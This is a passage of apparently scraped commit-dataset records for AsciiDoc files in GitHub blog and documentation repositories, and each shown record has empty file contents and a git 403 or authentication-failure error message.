'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"543428fbebe2ccf546684d8b9c1b95b0a27db5df","subject":"Delete the file at '_posts\/2017-05-31-Naming-Conventions.adoc'","message":"Delete the file at '_posts\/2017-05-31-Naming-Conventions.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbdec216fec34942d50bfa1229b48c8fa58d4401","subject":"Add initial asciidoc notes","message":"Add initial asciidoc notes\n","repos":"jeaye\/jeaye.github.io,jeaye\/jeaye.github.io","old_file":"_drafts\/asciidoc.adoc","new_file":"_drafts\/asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jeaye\/jeaye.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a67a7e6999a4c9c7265600ee33e4c5c2a240cb","subject":"y2b create post Does Size Matter?","message":"y2b create post Does Size Matter?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-07-Does-Size-Matter.adoc","new_file":"_posts\/2015-07-07-Does-Size-Matter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ce750efc5c3889556bd49785f1affc85ed61c24","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9822c0b5421c81d50c30484ec643069b86ac0b1d","subject":"another small fix","message":"another small fix\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_toc.asciidoc","new_file":"trex_toc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"621691408d1bcdf90c07a20b0e363d1a6eede58f","subject":"Delete 2016-5-13-Engineer-Career-Path.adoc","message":"Delete 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec4d5e34b02c0e2902f2b71327cdf8353dc247a1","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"387a8e259ce84f5a445c6f7b74853649f48065cd","subject":"Update 2015-11-11-De-casa-nova.adoc","message":"Update 2015-11-11-De-casa-nova.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-11-11-De-casa-nova.adoc","new_file":"_posts\/2015-11-11-De-casa-nova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4699d3d07640df9ba751bc7fc5c5a2eaf24a4ebb","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b8bb2fac22202c12c0116f023dfb40cda185691","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e484e95aa4d7b8b7757ac4a9531d251282ad951c","subject":"Update 2015-02-11-New-try.adoc","message":"Update 2015-02-11-New-try.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-11-New-try.adoc","new_file":"_posts\/2015-02-11-New-try.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ee2c77c50149645247e9f81ead047273e8aed81","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9a70ad9b3e2cd1751b37671aff76c15297d6baf","subject":"y2b create post I Bought The Cheapest Smartphone on Amazon...","message":"y2b create post I Bought The Cheapest Smartphone on Amazon...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-10-IBoughtTheCheapestSmartphoneonAmazon.adoc","new_file":"_posts\/2018-02-10-IBoughtTheCheapestSmartphoneonAmazon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31ae59b8a2c639d406eba1292a0b5aa740f4ecc0","subject":"Add 2018-08-09-forge-3.9.1.final.asciidoc","message":"Add 2018-08-09-forge-3.9.1.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2018-08-09-forge-3.9.1.final.asciidoc","new_file":"news\/2018-08-09-forge-3.9.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c3f89b2fc2bf64bf0557bdd5a25404cee1ef166d","subject":"DELTASPIKE-421 Documentation of optional query results","message":"DELTASPIKE-421 Documentation of optional query results\n","repos":"rafabene\/deltaspike,os890\/deltaspike-vote,subaochen\/deltaspike,rafabene\/deltaspike,os890\/deltaspike-vote,idontgotit\/deltaspike,rdicroce\/deltaspike,jharting\/deltaspike,subaochen\/deltaspike,Danny02\/deltaspike,danielsoro\/deltaspike,LightGuard\/incubator-deltaspike,struberg\/deltaspike,apache\/deltaspike,LightGuard\/incubator-deltaspike,apache\/deltaspike,chkal\/deltaspike,tremes\/deltaspike,os890\/DeltaSpikePlayground,struberg\/deltaspike,subaochen\/deltaspike,chkal\/deltaspike,tremes\/deltaspike,idontgotit\/deltaspike,idontgotit\/deltaspike,danielsoro\/deltaspike,tremes\/deltaspike,chkal\/deltaspike,mlachat\/deltaspike,LightGuard\/incubator-deltaspike,danielsoro\/deltaspike,rdicroce\/deltaspike,rdicroce\/deltaspike,struberg\/deltaspike,Danny02\/deltaspike,os890\/DS_Discuss,os890\/DS_Discuss,rdicroce\/deltaspike,os890\/deltaspike-vote,apache\/deltaspike,os890\/deltaspike-vote,jharting\/deltaspike,apache\/deltaspike,idontgotit\/deltaspike,chkal\/deltaspike,os890\/DeltaSpikePlayground,subaochen\/deltaspike,mlachat\/deltaspike,struberg\/deltaspike,os890\/DS_Discuss,os890\/DS_Discuss,Danny02\/deltaspike,Danny02\/deltaspike,jharting\/deltaspike,os890\/DeltaSpikePlayground,rafabene\/deltaspike,mlachat\/deltaspike,mlachat\/deltaspike,tremes\/deltaspike,danielsoro\/deltaspike","old_file":"deltaspike\/modules\/data\/README.adoc","new_file":"deltaspike\/modules\/data\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4560fc3ce9957da973305616347ea661797717a9","subject":"WIP(deferred-promise): Start","message":"WIP(deferred-promise): Start\n","repos":"azu\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,mzbac\/promises-book,sunfurong\/promise,genie88\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,oToUC\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,mzbac\/promises-book,genie88\/promises-book,wenber\/promises-book,mzbac\/promises-book,cqricky\/promises-book,wenber\/promises-book,dieface\/promises-book,dieface\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,tangjinzhou\/promises-book,cqricky\/promises-book,wenber\/promises-book,azu\/promises-book,purepennons\/promises-book,lidasong2014\/promises-book,azu\/promises-book,dieface\/promises-book,azu\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,genie88\/promises-book,liubin\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,oToUC\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,liubin\/promises-book,liubin\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book","old_file":"Ch4_AdvancedPromises\/deferred-promise.adoc","new_file":"Ch4_AdvancedPromises\/deferred-promise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34bbd06caabff211b656716217c5be4484c1d7fd","subject":"Update 2016-04-16-This-is-all-we-are.adoc","message":"Update 2016-04-16-This-is-all-we-are.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-16-This-is-all-we-are.adoc","new_file":"_posts\/2016-04-16-This-is-all-we-are.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d438f9520694a6cd5f81c5490819ef875f9b5797","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92cb4d4af5991ec113afbcc8fff4588efeeb73e2","subject":"y2b create post LG G Watch Unboxing!","message":"y2b create post LG G Watch Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-26-LG-G-Watch-Unboxing.adoc","new_file":"_posts\/2014-06-26-LG-G-Watch-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f60f95a22a36e48506deb227ec088159e2a7c4c4","subject":"Update 2016-05-24-Useful-Git-commands.adoc","message":"Update 2016-05-24-Useful-Git-commands.adoc","repos":"grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io","old_file":"_posts\/2016-05-24-Useful-Git-commands.adoc","new_file":"_posts\/2016-05-24-Useful-Git-commands.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grzrobak\/grzrobak.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a5405cf7de1055110701b8a439cc457e1f8bcab","subject":"y2b create post Huge Screen Gaming (Xbox 360 \\u0026 PS3)","message":"y2b create post Huge Screen Gaming (Xbox 360 \\u0026 PS3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-17-Huge-Screen-Gaming-Xbox-360-u0026-PS3.adoc","new_file":"_posts\/2011-12-17-Huge-Screen-Gaming-Xbox-360-u0026-PS3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"391bb20de280cb1da6a59946e1b4bf33bee4b276","subject":"advanced_usage documentation (with all files)","message":"advanced_usage documentation (with all files)\n","repos":"Swagger2Markup\/swagger2markup,johanhammar\/swagger2markup","old_file":"src\/docs\/asciidoc\/advanced_usage.adoc","new_file":"src\/docs\/asciidoc\/advanced_usage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/johanhammar\/swagger2markup.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fe0e727784b311e2b76f3b5a06d3a823d2006f4","subject":"Update custom fonts page.","message":"Update custom fonts page.\n\n","repos":"kironapublic\/vaadin,peterl1084\/framework,mstahv\/framework,peterl1084\/framework,peterl1084\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,peterl1084\/framework,Darsstar\/framework,mstahv\/framework,kironapublic\/vaadin,mstahv\/framework,asashour\/framework,kironapublic\/vaadin,mstahv\/framework,asashour\/framework,kironapublic\/vaadin,peterl1084\/framework,Darsstar\/framework,asashour\/framework,kironapublic\/vaadin","old_file":"documentation\/themes\/themes-fonts.asciidoc","new_file":"documentation\/themes\/themes-fonts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66ada795e822bfecc38ca7732fe79aa086846546","subject":"Update 2016-02-02-CONCEPTS.adoc","message":"Update 2016-02-02-CONCEPTS.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df52dd829e26b416bbf9f02465a7da078b9116b9","subject":"Update 2016-12-16-testpost.adoc","message":"Update 2016-12-16-testpost.adoc","repos":"osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io","old_file":"_posts\/2016-12-16-testpost.adoc","new_file":"_posts\/2016-12-16-testpost.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/osada9000\/osada9000.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89fcb11a41f6007941c4bec6271e8e42aeb293ff","subject":"Update 2017-03-11-Poetry-2.adoc","message":"Update 2017-03-11-Poetry-2.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-11-Poetry-2.adoc","new_file":"_posts\/2017-03-11-Poetry-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f719235cc873600f54fefb531c05382a77eafdfb","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"393f9cf595380c3aaa0d1c30ce86a4bced8fcee0","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8525a5c124d315b750477554e70982bf21a12601","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"499b763026615e24fe1668d4f27573e37be1576b","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37769e13af020d74aad2e8e3c06f7c22a7b9b4b2","subject":"Update 2017-03-23-Hello-World.adoc","message":"Update 2017-03-23-Hello-World.adoc","repos":"jbutz\/hubpress-test,jbutz\/hubpress-test,jbutz\/hubpress-test,jbutz\/hubpress-test","old_file":"_posts\/2017-03-23-Hello-World.adoc","new_file":"_posts\/2017-03-23-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbutz\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b223ed82ac81cfc0bc5d5b1d2bda477cceef8db","subject":"Update 2018-05-02-G-A-S-Slack.adoc","message":"Update 2018-05-02-G-A-S-Slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-G-A-S-Slack.adoc","new_file":"_posts\/2018-05-02-G-A-S-Slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"464a09600a0afe95ce93f26ac5caccfb3214136f","subject":"Update 2017-03-17-iphone-irkit-arduino.adoc","message":"Update 2017-03-17-iphone-irkit-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b09c57320c3fb0409596afd39ca6735e9001fcd","subject":"Update 2015-06-11-WalkingMapKyoto.adoc","message":"Update 2015-06-11-WalkingMapKyoto.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-11-WalkingMapKyoto.adoc","new_file":"_posts\/2015-06-11-WalkingMapKyoto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e90c571c4194d02254d39ace816e5b18d20817f4","subject":"Update 2017-11-04-Richard-Bellman.adoc","message":"Update 2017-11-04-Richard-Bellman.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-11-04-Richard-Bellman.adoc","new_file":"_posts\/2017-11-04-Richard-Bellman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cc768ed0a1f53dda8b5f6e2c28e9003ab1d1144","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c031260fdefb73b677e1898c8277139009f9751e","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"853e312af08cc1ea25dad7f5d84a70f7285ddb27","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ebe7b09c01a3a6457da1fb79eb71f1a98ef7d89","subject":"Update 2019-12-23-Third-Anniversary.adoc","message":"Update 2019-12-23-Third-Anniversary.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-12-23-Third-Anniversary.adoc","new_file":"_posts\/2019-12-23-Third-Anniversary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6420af2a0080ca091aea07c8f375ca8eb3893f40","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e8497104ab25887e4fa9cdb23c6c702e1b101da","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2c7cb24b2b8df2f1fd13b240cd546a479cd3cf2","subject":"Create 2016-08-12-Why-Using-Framework.adoc","message":"Create 